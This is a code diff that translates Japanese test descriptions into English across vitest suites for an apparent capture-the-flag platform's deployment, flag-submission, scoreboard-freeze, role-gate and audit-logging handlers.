+    it("should return scoring_locked when scoringLocked=true, even if startsAt is OK", async () => {
       const before = new Date(Date.now() - 60 * 60 * 1000).toISOString();
       const { shared, ddbSend } = buildShared();
       ddbSend.mockResolvedValueOnce({ Items: [eventRow] });
@@ -244,7 +244,7 @@ describe("revealHint (#742 Phase 3)", () => {
       expect(out.kind).toBe("scoring_locked");
     });
 
-    it("startsAt 過去 + endsAt 未来 + status=READY なら gate を通って ok で penalty を deduct すべき", async () => {
+    it("should pass the gate and deduct penalty as ok when startsAt past + endsAt future + status=READY", async () => {
       const before = new Date(Date.now() - 60 * 60 * 1000).toISOString();
       const future = new Date(Date.now() + 60 * 60 * 1000).toISOString();
       const { shared, ddbSend } = buildShared();
@@ -259,7 +259,7 @@ describe("revealHint (#742 Phase 3)", () => {
       expect(out.penaltyApplied).toBe(10);
     });
 
-    it("eventId が item に無い legacy row は gate check を skip して旧挙動で reveal すべき", async () => {
+    it("should skip the gate check and reveal with legacy behavior for legacy rows without eventId on the item", async () => {
       // = team の row に eventId が無いケース (= non-event-scoped、 historical)
       const { shared, ddbSend } = buildShared();
       ddbSend.mockResolvedValueOnce({ Items: [sampleRow({ score: 100 })] }); // no eventId

--- a/infrastructure/test/problem-deploy/role-gates.test.ts
+++ b/infrastructure/test/problem-deploy/role-gates.test.ts
@@ -297,17 +297,17 @@ describe("ADR-020 Phase B.1 (#948): deploy-handler route role gates", () => {
       process.env.DEFAULT_USER_ROLE = "TenantViewer";
     });
 
-    it("GET /problems/:id/deployments は 200 を返すべき (= dropdown populate のため Viewer も pass)", async () => {
+    it("GET /problems/:id/deployments should return 200 (Viewer should also pass for dropdown population)", async () => {
       const res = await deployApp.request(`/problems/${PROBLEM}/deployments`);
       expect(res.status).toBe(200);
     });
 
-    it("GET /deployments/:jobId は pass するべき", async () => {
+    it("GET /deployments/:jobId should pass", async () => {
       const res = await deployApp.request(`/deployments/${ULID}`);
       await expectNotForbidden(res);
     });
 
-    it("POST /problems/:id/deploy は 403 forbidden_role になるべき", async () => {
+    it("POST /problems/:id/deploy should return 403 forbidden_role", async () => {
       const res = await deployApp.request(`/problems/${PROBLEM}/deploy`, {
         method: "POST",
         body: JSON.stringify({
@@ -320,7 +320,7 @@ describe("ADR-020 Phase B.1 (#948): deploy-handler route role gates", () => {
       await expectForbidden(res);
     });
 
-    it("POST /deployments/retry は 403 になるべき", async () => {
+    it("POST /deployments/retry should return 403", async () => {
       const res = await deployApp.request("/deployments/retry", {
         method: "POST",
         body: JSON.stringify({ failedJobIds: [ULID] }),
@@ -329,7 +329,7 @@ describe("ADR-020 Phase B.1 (#948): deploy-handler route role gates", () => {
       await expectForbidden(res);
     });
 
-    it("DELETE /deployments/:jobId は 403 になるべき", async () => {
+    it("DELETE /deployments/:jobId should return 403", async () => {
       const res = await deployApp.request(`/deployments/${ULID}`, { method: "DELETE" });
       await expectForbidden(res);
     });

--- a/infrastructure/test/problem-deploy/scoreboard-freeze.test.ts
+++ b/infrastructure/test/problem-deploy/scoreboard-freeze.test.ts
@@ -19,25 +19,25 @@ describe("isWithinFreezeWindow (Issue #1038 P1 #9 follow-up)", () => {
   const endsAt = "2026-05-19T01:00:00.000Z";
   const endsAtMs = Date.parse(endsAt);
 
-  it("default は 30 分前から freeze するべき (= 既存挙動を維持)", () => {
+  it("should freeze from 30 minutes before by default (existing behavior)", () => {
     expect(isWithinFreezeWindow(endsAt, endsAtMs - 31 * 60 * 1000)).toBe(false);
     expect(isWithinFreezeWindow(endsAt, endsAtMs - 30 * 60 * 1000)).toBe(true);
     expect(isWithinFreezeWindow(endsAt, endsAtMs - 1 * 60 * 1000)).toBe(true);
   });
 
-  it("operator が 60 分を指定したら 60 分前から freeze するべき", () => {
+  it("should freeze from 60 minutes before when operator specifies 60 minutes", () => {
     expect(isWithinFreezeWindow(endsAt, endsAtMs - 61 * 60 * 1000, 60)).toBe(false);
     expect(isWithinFreezeWindow(endsAt, endsAtMs - 60 * 60 * 1000, 60)).toBe(true);
     expect(isWithinFreezeWindow(endsAt, endsAtMs - 30 * 60 * 1000, 60)).toBe(true);
   });
 
-  it("operator が 10 分を指定したら 10 分前から freeze するべき (= 既存より短い window)", () => {
+  it("should freeze from 10 minutes before when operator specifies 10 minutes (shorter window than default)", () => {
     expect(isWithinFreezeWindow(endsAt, endsAtMs - 31 * 60 * 1000, 10)).toBe(false);
     expect(isWithinFreezeWindow(endsAt, endsAtMs - 11 * 60 * 1000, 10)).toBe(false);
     expect(isWithinFreezeWindow(endsAt, endsAtMs - 10 * 60 * 1000, 10)).toBe(true);
   });
 
-  it("operator が 0 を指定したら freeze 無効になるべき (= 終了直前でも順位公開)", () => {
+  it("should disable freeze when operator specifies 0 (ranking stays public even at the end)", () => {
     expect(isWithinFreezeWindow(endsAt, endsAtMs - 1 * 60 * 1000, 0)).toBe(false);
     expect(isWithinFreezeWindow(endsAt, endsAtMs - 0, 0)).toBe(false);
   });
@@ -71,7 +71,7 @@ describe("isWithinFreezeWindow (Issue #1038 P1 #9 follow-up)", () => {
     expect(isWithinFreezeWindow(endsAt, endsAtMs - 31 * 60 * 1000, 999)).toBe(false);
   });
 
-  it("DEFAULT_FREEZE_MINUTES が export されているべき (= operator UI default 表示用)", () => {
+  it("DEFAULT_FREEZE_MINUTES should be exported (for operator UI default display)", () => {
     expect(DEFAULT_FREEZE_MINUTES).toBe(30);
   });
 

--- a/infrastructure/test/problem-deploy/sso-console-destination.test.ts
+++ b/infrastructure/test/problem-deploy/sso-console-destination.test.ts
@@ -16,7 +16,7 @@ const REGION = "ap-northeast-1";
 const NAME_PREFIX = "tc-hello-world-team-3";
 
 describe("buildConsoleDestination (#946)", () => {
-  it("ssmParameterName 未指定なら CFn stacks 画面を返すべき (= 旧挙動 / multi-resource 問題用)", () => {
+  it("should return the CFn stacks screen when ssmParameterName is unspecified (legacy behavior / multi-resource problems)", () => {
     const url = buildConsoleDestination({
       region: REGION,
       namePrefix: NAME_PREFIX,
@@ -27,7 +27,7 @@ describe("buildConsoleDestination (#946)", () => {
     );
   });
 
-  it("ssmParameterName が有効なら SSM Parameter detail URL を返すべき (= deep link、 list view 不要)", () => {
+  it("should return the SSM Parameter detail URL when ssmParameterName is valid (deep link, no list view)", () => {
     const url = buildConsoleDestination({
       region: REGION,
       namePrefix: NAME_PREFIX,
@@ -38,7 +38,7 @@ describe("buildConsoleDestination (#946)", () => {
     );
   });
 
-  it("ssmParameterName に許可外文字 (= `#` / `?`) を含むなら CFn fallback すべき (= URL injection 防御)", () => {
+  it("should fall back to CFn when ssmParameterName contains disallowed characters (`#` / `?`) (URL injection guard)", () => {
     const malicious = "/tc#injection?query";
     const url = buildConsoleDestination({
       region: REGION,
@@ -50,7 +50,7 @@ describe("buildConsoleDestination (#946)", () => {
     expect(url).not.toContain(encodeURIComponent(malicious));
   });
 
-  it("ssmParameterName が `/` で始まらないなら CFn fallback すべき", () => {
+  it("should fall back to CFn when ssmParameterName does not start with `/`", () => {
     const url = buildConsoleDestination({
       region: REGION,
       namePrefix: NAME_PREFIX,
@@ -59,7 +59,7 @@ describe("buildConsoleDestination (#946)", () => {
     expect(url).toContain("/cloudformation/home");
   });
 
-  it("ssmParameterName が空文字なら CFn fallback すべき", () => {
+  it("should fall back to CFn when ssmParameterName is empty", () => {
     const url = buildConsoleDestination({
       region: REGION,
       namePrefix: NAME_PREFIX,

--- a/infrastructure/test/problem-deploy/stack-progress.test.ts
+++ b/infrastructure/test/problem-deploy/stack-progress.test.ts
@@ -79,14 +79,14 @@ function buildCfn(events: unknown[], resources: unknown[]) {
 }
 
 describe("buildCfnConsoleUrl", () => {
-  it("stackId があれば stackinfo deep link を返すべき", () => {
+  it("should return a stackinfo deep link when stackId is present", () => {
     const url = buildCfnConsoleUrl(REGION, STACK_NAME, STACK_ID);
     expect(url).toContain("ap-northeast-1.console.aws.amazon.com/cloudformation");
     expect(url).toContain("#/stacks/stackinfo");
     expect(url).toContain(encodeURIComponent(STACK_ID));
   });
 
-  it("stackId が無ければ filteringText 経由の一覧 URL を返すべき", () => {
+  it("should return the filteringText list URL when stackId is missing", () => {
     const url = buildCfnConsoleUrl(REGION, STACK_NAME);
     expect(url).toContain("#/stacks?filteringText=");
     expect(url).toContain(encodeURIComponent(STACK_NAME));
@@ -94,7 +94,7 @@ describe("buildCfnConsoleUrl", () => {
 });
 
 describe("getStackProgress", () => {
-  it("DDB に行が無ければ not_found を返すべき", async () => {
+  it("should return not_found when the row is missing in DDB", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: undefined });
 
@@ -108,7 +108,7 @@ describe("getStackProgress", () => {
     expect(out.kind).toBe("not_found");
   });
 
-  it("tenantId が一致しない行は not_found を返すべき (クロステナント漏洩防止)", async () => {
+  it("should return not_found for rows whose tenantId does not match (cross-tenant leak guard)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow({ tenantId: "tenant-evil" }) });
 
@@ -122,7 +122,7 @@ describe("getStackProgress", () => {
     expect(out.kind).toBe("not_found");
   });
 
-  it("namePrefix が未設定なら stack_not_yet_created を返すべき", async () => {
+  it("should return stack_not_yet_created when namePrefix is unset", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: sampleRow({ namePrefix: undefined, stackId: undefined }),
@@ -138,7 +138,7 @@ describe("getStackProgress", () => {
     expect(out.kind).toBe("stack_not_yet_created");
   });
 
-  it("CFn から StackEvents と StackResources を取得して返すべき", async () => {
+  it("should fetch and return StackEvents and StackResources from CFn", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow() });
 
@@ -191,7 +191,7 @@ describe("getStackProgress", () => {
     expect(out.progress.consoleUrl).toContain("#/stacks/stackinfo");
   });
 
-  it("IN_PROGRESS が閾値を超えて動かない場合は stuck 原因と復旧ヒントを返すべき", async () => {
+  it("should return stuck cause and recovery hint when IN_PROGRESS is frozen past the threshold", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: sampleRow({
@@ -235,7 +235,7 @@ describe("getStackProgress", () => {
     expect(out.progress.stuck?.remediationHint).toContain("service quota");
   });
 
-  it("IN_PROGRESS でも直近 event が新しければ stuck と判定しないべき", async () => {
+  it("should not classify as stuck when IN_PROGRESS but recent events are fresh", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Item: sampleRow({
@@ -268,7 +268,7 @@ describe("getStackProgress", () => {
     expect(out.progress.stuck).toBeUndefined();
   });
 
-  it("最新 20 件に events を切り詰めるべき", async () => {
+  it("should truncate events to the latest 20", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow() });
 
@@ -291,7 +291,7 @@ describe("getStackProgress", () => {
     expect(out.progress.events).toHaveLength(20);
   });
 
-  it("CFn が ValidationError(does not exist) を返したら stack_not_found_in_cfn にすべき", async () => {
+  it("should map ValidationError(does not exist) from CFn to stack_not_found_in_cfn", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow() });
 
@@ -310,7 +310,7 @@ describe("getStackProgress", () => {
     expect(out.consoleUrl).toContain("cloudformation");
   });
 
-  it("その他の CFn エラーは throw して呼び出し側で 500 を返させるべき", async () => {
+  it("should throw other CFn errors and let the caller return 500", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow() });
 
@@ -325,7 +325,7 @@ describe("getStackProgress", () => {
     ).rejects.toThrow("Throttling");
   });
 
-  it("stackId が確定済なら CFn 呼び出しに stackId を渡すべき (同名再作成事故防止)", async () => {
+  it("should pass stackId to the CFn call once stackId is finalized (prevent same-name recreation accidents)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow() });
     const cfn = buildCfn([], []);
@@ -336,7 +336,7 @@ describe("getStackProgress", () => {
     expect(events.input.StackName).toBe(STACK_ID);
   });
 
-  it("stackId 未割当なら namePrefix を CFn 引数に使うべき", async () => {
+  it("should use namePrefix as the CFn argument when stackId is unassigned", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Item: sampleRow({ stackId: undefined }) });
     const cfn = buildCfn([], []);

--- a/infrastructure/test/problem-deploy/submit-flag.test.ts
+++ b/infrastructure/test/problem-deploy/submit-flag.test.ts
@@ -53,7 +53,7 @@ describe("submitFlag", () => {
     ddbSend = built.ddbSend;
   });
 
-  it("teamLoginKey が一致する row が無いときは unauthorized を返すべき", async () => {
+  it("should return unauthorized when no row matches teamLoginKey", async () => {
     ddbSend.mockResolvedValueOnce({ Items: [] });
     const out = await submitFlag(
       shared,
@@ -65,13 +65,13 @@ describe("submitFlag", () => {
     expect(out).toEqual({ kind: "unauthorized" });
   });
 
-  it("scoring 設定が無い problemId は not_flag_problem を返すべき", async () => {
+  it("should return not_flag_problem for problemIds without scoring config", async () => {
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow({ problemId: "no-scoring" })] });
     const out = await submitFlag(shared, flagScoring, "KEY", "no-scoring", "anything");
     expect(out).toEqual({ kind: "not_flag_problem" });
   });
 
-  it("既に flagSubmitted=true なら already_scored を返すべき (= 重複加算しない)", async () => {
+  it("should return already_scored when flagSubmitted=true already (don't double-count)", async () => {
     ddbSend.mockResolvedValueOnce({
       Items: [sampleRow({ flagSubmitted: true, score: 100 })],
     });
@@ -87,7 +87,7 @@ describe("submitFlag", () => {
     expect(ddbSend).toHaveBeenCalledTimes(1);
   });
 
-  it("stackOutputs に flagOutputKey が無いとき (= deploy 未完了) は no_outputs を返すべき", async () => {
+  it("should return no_outputs when stackOutputs lacks flagOutputKey (deploy not yet complete)", async () => {
     ddbSend.mockResolvedValueOnce({
       Items: [sampleRow({ stackOutputs: undefined })],
     });
@@ -95,7 +95,7 @@ describe("submitFlag", () => {
     expect(out).toEqual({ kind: "no_outputs" });
   });
 
-  it("submitted flag が expected と一致しなければ wrong + scoreDelta=0 を返すべき (penalty 未設定なら UpdateItem 呼ばない)", async () => {
+  it("should return wrong + scoreDelta=0 when the submitted flag does not match expected (no UpdateItem when penalty unset)", async () => {
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow({ score: 25, wrongAnswerCount: 3 })] });
     const out = await submitFlag(shared, flagScoring, "KEY", "hello-world", "wrong-answer");
     // Issue #817: penalty=0 / 未設定の場合は scoreDelta=0、 既存 wrongCount を返す互換挙動。
@@ -103,7 +103,7 @@ describe("submitFlag", () => {
     expect(ddbSend).toHaveBeenCalledTimes(1); // Query のみ、Update なし (= Free Tier WCU 節約)
   });
 
-  it("Issue #817: wrongAnswerPenalty > 0 で不正解なら score を減算 + wrongAnswerCount を ADD すべき", async () => {
+  it("Issue #817: should deduct score and ADD to wrongAnswerCount on wrong answer when wrongAnswerPenalty > 0", async () => {
     const penaltyScoring: Record<string, ProblemScoringMetadata> = {
       "hello-world": {
         kind: "flag",
@@ -128,7 +128,7 @@ describe("submitFlag", () => {
     expect(updateCmd.input.ConditionExpression).toContain("attribute_not_exists(flagSubmitted)");
   });
 
-  it("Issue #817: penalty で score が負数になっても totalScore は 0 で clamp して返すべき", async () => {
+  it("Issue #817: should clamp totalScore at 0 even when penalty drives score negative", async () => {
     const penaltyScoring: Record<string, ProblemScoringMetadata> = {
       "hello-world": {
         kind: "flag",
@@ -146,7 +146,7 @@ describe("submitFlag", () => {
     expect(out).toEqual({ kind: "wrong", scoreDelta: -50, totalScore: 0, wrongCount: 1 });
   });
 
-  it("Issue #817: penalty 経路で flagSubmitted=true との race (= CCF) は already_scored に倒すべき", async () => {
+  it("Issue #817: should fall to already_scored on CCF race with flagSubmitted=true on the penalty path", async () => {
     const penaltyScoring: Record<string, ProblemScoringMetadata> = {
       "hello-world": {
         kind: "flag",
@@ -167,7 +167,7 @@ describe("submitFlag", () => {
     expect(out).toEqual({ kind: "already_scored", totalScore: 100 });
   });
 
-  it("正解なら ADD score :pts SET flagSubmitted=true で UpdateItem し ok を返すべき", async () => {
+  it("should UpdateItem with ADD score :pts SET flagSubmitted=true and return ok on correct answer", async () => {
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] });
     ddbSend.mockResolvedValueOnce({ Attributes: { score: 100 } });
     const out = await submitFlag(
@@ -187,7 +187,7 @@ describe("submitFlag", () => {
     expect(updateCmd.input.ConditionExpression).toContain("attribute_not_exists(flagSubmitted)");
   });
 
-  it("trim した値が一致すれば ok を返すべき (= 末尾改行などで弾かない)", async () => {
+  it("should return ok when trimmed values match (don't reject on trailing newlines)", async () => {
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] });
     ddbSend.mockResolvedValueOnce({ Attributes: { score: 100 } });
     const out = await submitFlag(
@@ -200,7 +200,7 @@ describe("submitFlag", () => {
     expect(out.kind).toBe("ok");
   });
 
-  it("ConditionalCheckFailedException は already_scored で吸収するべき (= 並行 submit 対策)", async () => {
+  it("should absorb ConditionalCheckFailedException as already_scored (concurrent submit guard)", async () => {
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow({ score: 0 })] });
     const condErr = Object.assign(new Error("conditional check failed"), {
       name: "ConditionalCheckFailedException",
@@ -216,7 +216,7 @@ describe("submitFlag", () => {
     expect(out).toEqual({ kind: "already_scored", totalScore: 100 });
   });
 
-  it("Query は GSI2 を `TEAMKEY#<key>` で叩くべき", async () => {
+  it("Query should hit GSI2 with `TEAMKEY#<key>`", async () => {
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] });
     ddbSend.mockResolvedValueOnce({ Attributes: { score: 100 } });
     await submitFlag(
@@ -238,7 +238,7 @@ describe("submitFlag", () => {
   describe("competition scoring gate (Issue #13)", () => {
     const eventRow = sampleRow({ eventId: "EVT1", score: 0 });
 
-    it("Event 行が無い場合 fail-closed で scoring_not_started を返すべき", async () => {
+    it("should fail-closed with scoring_not_started when the Event row is missing", async () => {
       ddbSend.mockResolvedValueOnce({ Items: [eventRow] });
       ddbSend.mockResolvedValueOnce({}); // EventMeta GetItem returns no Item
       const out = await submitFlag(
@@ -251,7 +251,7 @@ describe("submitFlag", () => {
       expect(out).toEqual({ kind: "scoring_not_started" });
     });
 
-    it("startsAt 未設定 (READY だが時刻未指定) なら scoring_not_started を返すべき", async () => {
+    it("should return scoring_not_started when startsAt is unset (READY but time unspecified)", async () => {
       ddbSend.mockResolvedValueOnce({ Items: [eventRow] });
       ddbSend.mockResolvedValueOnce({ Item: { status: "READY" } });
       const out = await submitFlag(
@@ -264,7 +264,7 @@ describe("submitFlag", () => {
       expect(out.kind).toBe("scoring_not_started");
     });
 
-    it("now < startsAt なら scoring_not_started を返し startsAt を含めるべき", async () => {
+    it("should return scoring_not_started with startsAt when now < startsAt", async () => {
       const future = new Date(Date.now() + 60 * 60 * 1000).toISOString();
       ddbSend.mockResolvedValueOnce({ Items: [eventRow] });
       ddbSend.mockResolvedValueOnce({ Item: { status: "READY", startsAt: future } });
@@ -278,7 +278,7 @@ describe("submitFlag", () => {
       expect(out).toEqual({ kind: "scoring_not_started", startsAt: future });
     });
 
-    it("endsAt 設定 + now > endsAt なら scoring_ended を返すべき", async () => {
+    it("should return scoring_ended when endsAt is set and now > endsAt", async () => {
       const past = new Date(Date.now() - 60 * 60 * 1000).toISOString();
       const before = new Date(Date.now() - 2 * 60 * 60 * 1000).toISOString();
       ddbSend.mockResolvedValueOnce({ Items: [eventRow] });
@@ -295,7 +295,7 @@ describe("submitFlag", () => {
       expect(out).toEqual({ kind: "scoring_ended", endsAt: past });
     });
 
-    it("status=ENDED なら startsAt があっても scoring_ended を返すべき", async () => {
+    it("should return scoring_ended when status=ENDED, even if startsAt is set", async () => {
       const before = new Date(Date.now() - 60 * 60 * 1000).toISOString();
       ddbSend.mockResolvedValueOnce({ Items: [eventRow] });
       ddbSend.mockResolvedValueOnce({ Item: { status: "ENDED", startsAt: before } });
@@ -309,7 +309,7 @@ describe("submitFlag", () => {
       expect(out.kind).toBe("scoring_ended");
     });
 
-    it("startsAt 過去 + endsAt 未来 + status=READY なら gate を通って ok 加点すべき", async () => {
+    it("should pass the gate and award as ok when startsAt past + endsAt future + status=READY", async () => {
       const before = new Date(Date.now() - 60 * 60 * 1000).toISOString();
       const future = new Date(Date.now() + 60 * 60 * 1000).toISOString();
       ddbSend.mockResolvedValueOnce({ Items: [eventRow] });
@@ -343,7 +343,7 @@ describe("submitFlag", () => {
       expect(out).toEqual({ kind: "scoring_locked" });
     });
 
-    it("eventId 不在の row (= standalone deploy) では gate を skip して ok を返すべき (旧挙動互換)", async () => {
+    it("should skip the gate and return ok for rows without eventId (standalone deploy, legacy compat)", async () => {
       // event scope 無し → gate check しない → 即加点経路へ
       ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] }); // eventId 無し
       ddbSend.mockResolvedValueOnce({ Attributes: { score: 100 } });

--- a/infrastructure/test/problem-deploy/system-audit-writer.test.ts
+++ b/infrastructure/test/problem-deploy/system-audit-writer.test.ts
@@ -30,7 +30,7 @@ function buildEvent(
 
 describe("system-audit-writer (Issue #1034)", () => {
   describe("mapEventToAudit", () => {
-    it("onboardingRequest を tenant_create_requested + success として SYSTEM scope に書くべき", () => {
+    it("should write onboardingRequest as tenant_create_requested + success into the SYSTEM scope", () => {
       const event = buildEvent("onboardingRequest", { tenantId: "t-01", tier: "STANDARD" });
       const row = mapEventToAudit(event);
       expect(row).not.toBeNull();
@@ -41,44 +41,44 @@ describe("system-audit-writer (Issue #1034)", () => {
       expect(row?.extra.tier).toBe("STANDARD");
     });
 
-    it("onboardingFailure は outcome=error に倒すべき", () => {
+    it("should fall onboardingFailure to outcome=error", () => {
       const row = mapEventToAudit(buildEvent("onboardingFailure", { tenantId: "t-02" }));
       expect(row?.outcome).toBe("error");
       expect(row?.action).toBe("tenant_create_failed");
     });
 
-    it("offboardingRequest は tenant_delete_requested を返すべき", () => {
+    it("offboardingRequest should return tenant_delete_requested", () => {
       const row = mapEventToAudit(buildEvent("offboardingRequest", { tenantId: "t-03" }));
       expect(row?.action).toBe("tenant_delete_requested");
       expect(row?.outcome).toBe("success");
     });
 
-    it("offboardingSuccess は tenant_delete_succeeded を返すべき", () => {
+    it("offboardingSuccess should return tenant_delete_succeeded", () => {
       const row = mapEventToAudit(buildEvent("offboardingSuccess", { tenantId: "t-03" }));
       expect(row?.action).toBe("tenant_delete_succeeded");
     });
 
-    it("offboardingFailure は outcome=error に倒すべき", () => {
+    it("should fall offboardingFailure to outcome=error", () => {
       const row = mapEventToAudit(buildEvent("offboardingFailure", { tenantId: "t-03" }));
       expect(row?.outcome).toBe("error");
       expect(row?.action).toBe("tenant_delete_failed");
     });
 
-    it("未知の detail-type は null を返して skip すべき", () => {
+    it("should return null and skip unknown detail-types", () => {
       const row = mapEventToAudit(
         buildEvent("unknownEvent" as SbtTenantEventDetailType, { tenantId: "t-x" }),
       );
       expect(row).toBeNull();
     });
 
-    it("event.time から occurredAtMs を抽出すべき (= EventBridge が記録した実発生時刻を保持)", () => {
+    it("should extract occurredAtMs from event.time (preserving EventBridge's recorded occurrence time)", () => {
       const row = mapEventToAudit(
         buildEvent("onboardingSuccess", { tenantId: "t-04" }, "2026-04-01T12:34:56.000Z"),
       );
       expect(row?.occurredAtMs).toBe(new Date("2026-04-01T12:34:56.000Z").getTime());
     });
 
-    it("tenantName / tier がある時は extra に含めるべき", () => {
+    it("should include tenantName / tier in extra when present", () => {
       const row = mapEventToAudit(
         buildEvent("onboardingSuccess", { tenantId: "t-05", tenantName: "Acme", tier: "PLATINUM" }),
       );
@@ -109,7 +109,7 @@ describe("system-audit-writer (Issue #1034)", () => {
       } as const;
     }
 
-    it("FAILED build は codebuild_failed + outcome=error として SYSTEM scope に書くべき", () => {
+    it("should write FAILED builds as codebuild_failed + outcome=error into the SYSTEM scope", () => {
       const row = mapEventToAudit(buildCodeBuildEvent("FAILED"));
       expect(row).not.toBeNull();
       expect(row?.tenantId).toBe("SYSTEM");
@@ -120,7 +120,7 @@ describe("system-audit-writer (Issue #1034)", () => {
       expect(row?.extra.buildStatus).toBe("FAILED");
     });
 
-    it("FAULT / STOPPED / TIMED_OUT も audit に書くべき (= silent failure 網羅)", () => {
+    it("should also audit FAULT / STOPPED / TIMED_OUT (covering silent failures)", () => {
       for (const status of ["FAULT", "STOPPED", "TIMED_OUT"]) {
         const row = mapEventToAudit(buildCodeBuildEvent(status));
         expect(row).not.toBeNull();
@@ -129,37 +129,37 @@ describe("system-audit-writer (Issue #1034)", () => {
       }
     });
 
-    it("SUCCEEDED build は audit に書かないべき (= noise 抑制、 silent failure の対象外)", () => {
+    it("should not audit SUCCEEDED builds (noise suppression, out of silent-failure scope)", () => {
       expect(mapEventToAudit(buildCodeBuildEvent("SUCCEEDED"))).toBeNull();
     });
 
-    it("IN_PROGRESS build も audit に書かないべき (= mid-flight 状態)", () => {
+    it("should not audit IN_PROGRESS builds (mid-flight state)", () => {
       expect(mapEventToAudit(buildCodeBuildEvent("IN_PROGRESS"))).toBeNull();
     });
 
-    it("build-id があれば extra.buildId に保存すべき (= CloudWatch Logs deep link 用)", () => {
+    it("should persist build-id into extra.buildId (for CloudWatch Logs deep link)", () => {
       const row = mapEventToAudit(buildCodeBuildEvent("FAILED"));
       expect(row?.extra.buildId).toMatch(/build\//);
     });
   });
 
   describe("resolveActor", () => {
-    it("detail.sub があれば優先すべき (= Cognito 安定識別子)", () => {
+    it("should prefer detail.sub (Cognito stable identifier)", () => {
       expect(resolveActor({ sub: "cog-sub-1", cognitoUsername: "alice@example" })).toEqual({
         actor: "cog-sub-1",
         actorUsername: "alice@example",
       });
     });
 
-    it("detail.sub が無ければ actor field を見るべき", () => {
+    it("should fall back to the actor field when detail.sub is missing", () => {
       expect(resolveActor({ actor: "fallback-actor" })).toEqual({ actor: "fallback-actor" });
     });
 
-    it("いずれも無ければ sbt-control-plane を fallback とすべき", () => {
+    it("should fall back to sbt-control-plane when none are set", () => {
       expect(resolveActor({})).toEqual({ actor: "sbt-control-plane" });
     });
 
-    it("cognitoUsername と username の両方があれば cognitoUsername を優先すべき", () => {
+    it("should prefer cognitoUsername when both cognitoUsername and username are present", () => {
       expect(resolveActor({ sub: "s", cognitoUsername: "a", username: "b" })).toEqual({
         actor: "s",
         actorUsername: "a",

--- a/infrastructure/test/problem-deploy/team-key.test.ts
+++ b/infrastructure/test/problem-deploy/team-key.test.ts
@@ -2,13 +2,13 @@ import { describe, expect, it } from "vitest";
 import { generateTeamLoginKey } from "../../lib/problem-deploy/handlers/deploy-handler/team-key";
 
 describe("generateTeamLoginKey", () => {
-  it("base64url 形式の文字列を返すべき (32 byte → 43 chars)", () => {
+  it("should return a base64url string (32 bytes → 43 chars)", () => {
     const key = generateTeamLoginKey();
     expect(key).toMatch(/^[A-Za-z0-9_-]+$/);
     expect(key.length).toBe(43);
   });
 
-  it("呼び出しごとに異なるキーを返すべき", () => {
+  it("should return a different key on each call", () => {
     const a = generateTeamLoginKey();
     const b = generateTeamLoginKey();
     expect(a).not.toBe(b);

--- a/infrastructure/test/problem-deploy/team-score-events.test.ts
+++ b/infrastructure/test/problem-deploy/team-score-events.test.ts
@@ -34,7 +34,7 @@ const ev = (over: Record<string, unknown> = {}) => ({
 describe("collectTeamScoreEvents", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("複数 team の events を group + occurredAt 昇順で返すべき", async () => {
+  it("should return multiple teams' events grouped and sorted by occurredAt ascending", async () => {
     const { shared, ddbSend } = buildShared();
     // TEAM_A J1 と TEAM_B J2 — Promise.all なので mock 順は両方発火
     ddbSend.mockResolvedValueOnce({
@@ -79,7 +79,7 @@ describe("collectTeamScoreEvents", () => {
     expect(teams[1]?.events[0]?.source).toBe("flag");
   });
 
-  it("hint / flag-wrong / uptime / flag を含め、 attack-detected を除外するべき", async () => {
+  it("should include hint / flag-wrong / uptime / flag and exclude attack-detected", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [
@@ -99,7 +99,7 @@ describe("collectTeamScoreEvents", () => {
     expect(total).toBe(65); // 5 + 100 - 30 - 10
   });
 
-  it("displayName 不在 / teamName 不在ならば teamId を fallback として使うべき", async () => {
+  it("should fall back to teamId when displayName / teamName are absent", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [ev()] });
     const teams = await collectTeamScoreEvents(shared, {
@@ -109,7 +109,7 @@ describe("collectTeamScoreEvents", () => {
     expect(teams[0]?.teamName).toBe("TEAM_X");
   });
 
-  it("EVENT# query は ScanIndexForward=false + PK + EVENT# prefix で発火するべき", async () => {
+  it("EVENT# query should fire with ScanIndexForward=false + PK + EVENT# prefix", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [ev()] });
     await collectTeamScoreEvents(shared, {
@@ -151,7 +151,7 @@ describe("collectTeamScoreEvents", () => {
     ]);
   });
 
-  it("空 deployments なら空 teams を返すべき (= DDB 呼び出しなし)", async () => {
+  it("should return empty teams when deployments are empty (no DDB call)", async () => {
     const { shared, ddbSend } = buildShared();
     const teams = await collectTeamScoreEvents(shared, {
       deployments: [],
@@ -161,7 +161,7 @@ describe("collectTeamScoreEvents", () => {
     expect(ddbSend).not.toHaveBeenCalled();
   });
 
-  it("operator 内部情報 (PK / SK / expiresAt) を出力に含めないべき", async () => {
+  it("should not include operator-internal info (PK / SK / expiresAt) in output", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [

--- a/infrastructure/test/problem-deploy/tenant-saml.test.ts
